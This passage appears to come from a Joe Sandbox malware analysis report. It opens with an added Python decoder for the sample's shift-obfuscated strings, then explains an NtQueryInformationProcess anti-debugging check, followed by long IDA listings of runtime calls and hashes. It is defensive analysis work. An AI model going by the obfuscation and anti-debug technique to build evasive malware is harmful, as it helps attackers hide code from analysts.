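Added example; not code from the sample or from Joe Sandbox.

Assumption (derived from the report, not stated by it): names are hidden by
subtracting 55 from each character's position within printable ASCII
(0x20..0x7E, 95 symbols) and wrapping around. Decoding adds the 55 back.
"""
from typing import Dict, Optional

PRINTABLE_LO = 0x20   # first printable ASCII character (space)
PRINTABLE_N = 95      # 0x20..0x7E inclusive
SHIFT = 55            # recovered from the ntdll.dll / NtQueryInformationProcess pairs (assumption)

# Strings copied verbatim from this report's "String ID" fields ('$' is Joe Sandbox's separator).
ENCODED_FROM_REPORT: Dict[str, str] = {
    "module": "7=-55V-55",
    "export": "v=y>.;Bq7/8;6*=287x;8,.<<",
    "msgbox_title": "k;B9=8prHYVXTHk87/20Hn25.Hz.98;=",
}


def _shift_char(ch: str, delta: int) -> str:
    """Rotate one character by delta positions within printable ASCII; leave others untouched."""
    code = ord(ch)
    if not PRINTABLE_LO <= code < PRINTABLE_LO + PRINTABLE_N:
        return ch
    return chr((code - PRINTABLE_LO + delta) % PRINTABLE_N + PRINTABLE_LO)


def decode(s: str, shift: int = SHIFT) -> str:
    """Undo the sample's encoding by adding the shift back."""
    return "".join(_shift_char(c, shift) for c in s)


def encode(s: str, shift: int = SHIFT) -> str:
    """Inverse of decode(); handy for turning other suspected names into YARA/grep patterns."""
    return "".join(_shift_char(c, -shift) for c in s)


def recover_shift(ciphertext: str, known_plaintext: str) -> Optional[int]:
    """Known-plaintext check: return the single shift that maps ciphertext onto plaintext,
    or None when no single shift explains every character (i.e. the hypothesis fails)."""
    if len(ciphertext) != len(known_plaintext):
        return None
    candidates = set(range(PRINTABLE_N))
    for c, p in zip(ciphertext, known_plaintext):
        candidates = {k for k in candidates if _shift_char(c, k) == p}
        if not candidates:
            return None
    return candidates.pop() if len(candidates) == 1 else None


def decode_report_strings() -> Dict[str, str]:
    """Decode every encoded string collected from this report."""
    return {name: decode(enc) for name, enc in ENCODED_FROM_REPORT.items()}


if __name__ == "__main__":
    for name, plain in decode_report_strings().items():
        print(f"{name:13s} -> {plain!r}")
```

Running it prints "ntdll.dll" for the module string and "NtQueryInformationProcess" for the export string; recover_shift() returns 55 for both pairs, which is what justifies applying the same shift to the MessageBox title. That recovered export name fits the stack values Joe Sandbox shows at the GetCurrentProcess calls (0x1E then 0x1F, each with a 4-byte output buffer): 30 and 31 are the standard PROCESSINFOCLASS values ProcessDebugObjectHandle and ProcessDebugFlags, a common pair of NtQueryInformationProcess-based debugger checks and consistent with the "checks if the current process is being debugged" signatures at the top of this report. The report itself does not name the call, so treat that reading as inference.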
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _wcschr$CreateDirectoryErrorLast_memset
                                      • String ID:
                                      • API String ID: 772003639-0
                                      • Opcode ID: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction ID: 2d672686d953e9741263a9bf21e8db2c6a89ede790307b3869fa385045096eae
                                      • Opcode Fuzzy Hash: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction Fuzzy Hash: B24173B0900218DBDB24CF65CC85BE97B74AB44300F0089FAE709772C1D6799A9A8F6D
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      • Opcode ID: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction ID: 47fafc7281d56cd7232f0f11f7b3e10cd24c1ba3464f88fcbebd715b16cd05de
                                      • Opcode Fuzzy Hash: b3edb804a2ed5fe6fc273de50f7a7719d18c49f6bab6bd9d22b8017dd684581b
                                      • Instruction Fuzzy Hash: 11112733504211ABCB312FB5AC066DB3B989F453A5B20442BF948A6251EEBCDDC1879D
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction ID: e4933e4f9cff87b6db1e50e91856c3ef302a7f33dd3041806c411e2e618183a8
                                      • Opcode Fuzzy Hash: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction Fuzzy Hash: D7F0F631940214ABD720FB6699037CE33906F04728F14010FF818E72D2DBFC48C19A5D
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      • Opcode ID: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction ID: 9fc85db481ca541f5af55655987844c855698c76e688db874c41ef445bc3599c
                                      • Opcode Fuzzy Hash: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction Fuzzy Hash: 244176B4A00209EFCB08CF98D5909DEB7F2BF89300F208599E9156B395D735AE41DF99
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      • Opcode ID: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction ID: a62dec62c92b60b4c519499498a98483a560beb34225c0dd4930cde99cd07262
                                      • Opcode Fuzzy Hash: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction Fuzzy Hash: 7B61B3B5E04208EBDF04DFE4C851BEEBBB1AF88304F148069E9057B381D738AA45DB95
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: 5b5670c111a8cead40a1ffb16e00d74f18a4a9ed4f14907d396a6f9763220556
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 7E117E3200054EFBCF125E85DC418EE3F22BB89354B598456FE2859131D33AC9B2AB85
                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 1414122017-0
                                      • Opcode ID: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction ID: 1e2d0527fb0d68fa3bcd4beffa05bed18b15ee7e689a91fba965b1ab2acf346e
                                      • Opcode Fuzzy Hash: 628b221664b1de1b8864bd8eee2c730a3d4728c63bc10f80fa00fd3fcebfbc6c
                                      • Instruction Fuzzy Hash: 5101473550020A66CB10E757D802AEEBBE99B80358F14007FF400A21D3DB79AA92CA8D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      • Opcode ID: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction ID: 98ac9bbf1862fee8dd38477f1cb269d12124be3a97ef54141adb3ea9d1f28a8a
                                      • Opcode Fuzzy Hash: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction Fuzzy Hash: AE711C71A00208AFCB14CF98D980BEEB7B1EF45314F20C5AAE859A7381D735AE55CF45
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      • Opcode ID: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction ID: 63a32dae344941abd75bf44d8694bd3729833ffbde521e45b6cf845468b15615
                                      • Opcode Fuzzy Hash: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction Fuzzy Hash: BB41BEB4E04208EFCB08DF99D59099EB7B2FF89304F208169E9556B395C734AE41DF58
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      • Opcode ID: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction ID: d2c120628e0025ae6c47003c0dfc20d879d162270b197ae00e22ec2d328a1bd1
                                      • Opcode Fuzzy Hash: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction Fuzzy Hash: D241FB70D0424ADFCF04CF94C9507BEBBB1BF41309F2581AAD4127B286C379AA65DB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      • Opcode ID: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction ID: 66bd6867b88826b1b95dfa9d2ffa6d0f737279d13ab6826bb27aa332bf879093
                                      • Opcode Fuzzy Hash: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction Fuzzy Hash: 5F312F70E0410AABDF04CF95C980ABFB7B5FF98304F10846AE515EB292E734AE51DB95
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                      • String ID: invalid string position
                                      • API String ID: 1785806476-1799206989
                                      • Opcode ID: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction ID: c0dfb9ad1d84408aca3c0bc4771f70511c2b5052637a80a5b2d9d5061a7f9e99
                                      • Opcode Fuzzy Hash: 4f688eb7b139980606b6249c5054c7ec464165af03321488a7c1d0b7f26760dd
                                      • Instruction Fuzzy Hash: D23199B4D0021ADFCB08DF98C5809AEBBB1FF89304F108959E9256B385C734EA41CF95
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: 5$EOS
                                      • API String ID: 909875538-1935795245
                                      • Opcode ID: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction ID: cbb266d7676478089d8eb310e371b3e9da3167fd0b533db38114e6f4d1a4e4ac
                                      • Opcode Fuzzy Hash: 5d19d25491994af5a54c3fabd4302859563863366bd15e4f2d1bcdf2a326ec21
                                      • Instruction Fuzzy Hash: F001C471940308BBDB00DB75DC42BEA7364AB09704F408039F8027B1C2E678D61596A9
                                      APIs
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147B0
                                        • Part of subcall function 004147AA: __getptd.LIBCMT ref: 004147C0
                                      • __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00416014
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: csm
                                      • API String ID: 803148776-1018135373
                                      • Opcode ID: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction ID: de1ba10ac35249198c25df3b2f6096fc92783805510d7df63b2757107bfbf943
                                      • Opcode Fuzzy Hash: 7bb9c1e30fbc5ae72e6ed50af7ca16e765d77639bd1419dbdef8fde2e0cfdfc7
                                      • Instruction Fuzzy Hash: 9C014B34800305DACF34EF25C4446EEBBB6AF18311F25442FE445A6292DB3EC9C4CB59

                                      Execution Graph

                                      Execution Coverage:4.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:2%
                                      Total number of Nodes:1195
                                      Total number of Limit Nodes:16
API calls 9810->9811 9812 410b58 9811->9812 9812->9804 9813->9812 9814 410b21 _raise 66 API calls 9813->9814 9814->9810 9815 40e4b0 9816 40e4c9 9815->9816 9817 40e4df 9815->9817 9816->9817 9818 40e4e3 CreateFileW 9816->9818 9818->9817 9819 40e509 ReadFile CloseHandle 9818->9819 9819->9817 9820 40f6f6 9860 412140 9820->9860 9822 40f702 GetStartupInfoW 9823 40f716 HeapSetInformation 9822->9823 9825 40f721 9822->9825 9823->9825 9861 412117 HeapCreate 9825->9861 9826 40f76f 9827 40f77a 9826->9827 9989 40f6cd 9826->9989 9862 410689 GetModuleHandleW 9827->9862 9830 40f780 9831 40f78b __RTC_Initialize 9830->9831 9832 40f6cd _fast_error_exit 66 API calls 9830->9832 9887 411e86 GetStartupInfoW 9831->9887 9832->9831 9835 40f7a5 GetCommandLineA 9900 411def GetEnvironmentStringsW 9835->9900 9836 4116e9 __amsg_exit 66 API calls 9838 40f7a4 9836->9838 9838->9835 9842 40f7ca 9926 411abe 9842->9926 9843 4116e9 __amsg_exit 66 API calls 9843->9842 9845 40f7d0 9846 40f7db 9845->9846 9847 4116e9 __amsg_exit 66 API calls 9845->9847 9946 4114c8 9846->9946 9847->9846 9849 40f7e3 9850 40f7ee 9849->9850 9851 4116e9 __amsg_exit 66 API calls 9849->9851 9952 411a5f 9850->9952 9851->9850 9856 40f81e 10000 4116cb 9856->10000 9859 40f823 ___FrameUnwindToState 9860->9822 9861->9826 9863 4106a6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9862->9863 9864 41069d 9862->9864 9868 4106f0 TlsAlloc 9863->9868 10003 4103d6 9864->10003 9869 4107ff 9868->9869 9870 41073e TlsSetValue 9868->9870 9869->9830 9870->9869 9871 41074f 9870->9871 10013 411471 9871->10013 9876 410797 DecodePointer 9879 4107ac 9876->9879 9877 4107fa 9878 4103d6 __mtterm 70 API calls 9877->9878 9878->9869 9879->9877 9880 412773 __calloc_crt 66 API calls 9879->9880 9881 4107c2 9880->9881 9881->9877 9882 4107ca DecodePointer 9881->9882 9883 4107db 9882->9883 9883->9877 9884 4107df 9883->9884 9885 410413 __getptd_noexit 66 API calls 9884->9885 9886 4107e7 GetCurrentThreadId 9885->9886 9886->9869 9888 412773 __calloc_crt 66 
API calls 9887->9888 9894 411ea4 9888->9894 9889 41204f GetStdHandle 9895 412019 9889->9895 9890 412773 __calloc_crt 66 API calls 9890->9894 9891 4120b3 SetHandleCount 9899 40f799 9891->9899 9892 412061 GetFileType 9892->9895 9893 411f99 9893->9895 9896 411fd0 InitializeCriticalSectionAndSpinCount 9893->9896 9897 411fc5 GetFileType 9893->9897 9894->9890 9894->9893 9894->9895 9894->9899 9895->9889 9895->9891 9895->9892 9898 412087 InitializeCriticalSectionAndSpinCount 9895->9898 9896->9893 9896->9899 9897->9893 9897->9896 9898->9895 9898->9899 9899->9835 9899->9836 9901 40f7b5 9900->9901 9902 411e0b WideCharToMultiByte 9900->9902 9913 411d34 9901->9913 9904 411e40 9902->9904 9905 411e78 FreeEnvironmentStringsW 9902->9905 9906 41272e __malloc_crt 66 API calls 9904->9906 9905->9901 9907 411e46 9906->9907 9907->9905 9908 411e4e WideCharToMultiByte 9907->9908 9909 411e60 9908->9909 9910 411e6c FreeEnvironmentStringsW 9908->9910 9911 410cbb _free 66 API calls 9909->9911 9910->9901 9912 411e68 9911->9912 9912->9910 9914 411d49 9913->9914 9915 411d4e GetModuleFileNameA 9913->9915 10030 410039 9914->10030 9917 411d75 9915->9917 10024 411b9a 9917->10024 9920 40f7bf 9920->9842 9920->9843 9921 411db1 9922 41272e __malloc_crt 66 API calls 9921->9922 9923 411db7 9922->9923 9923->9920 9924 411b9a _parse_cmdline 76 API calls 9923->9924 9925 411dd1 9924->9925 9925->9920 9927 411ac7 9926->9927 9930 411acc _strlen 9926->9930 9928 410039 ___initmbctable 94 API calls 9927->9928 9928->9930 9929 412773 __calloc_crt 66 API calls 9935 411b01 _strlen 9929->9935 9930->9929 9933 411ada 9930->9933 9931 411b50 9932 410cbb _free 66 API calls 9931->9932 9932->9933 9933->9845 9934 412773 __calloc_crt 66 API calls 9934->9935 9935->9931 9935->9933 9935->9934 9936 411b76 9935->9936 9938 410b34 _strcpy_s 66 API calls 9935->9938 9939 411b8d 9935->9939 9937 410cbb _free 66 API calls 9936->9937 9937->9933 9938->9935 9940 410a7d __invoke_watson 10 API calls 9939->9940 9941 411b99 9940->9941 9942 413a75 
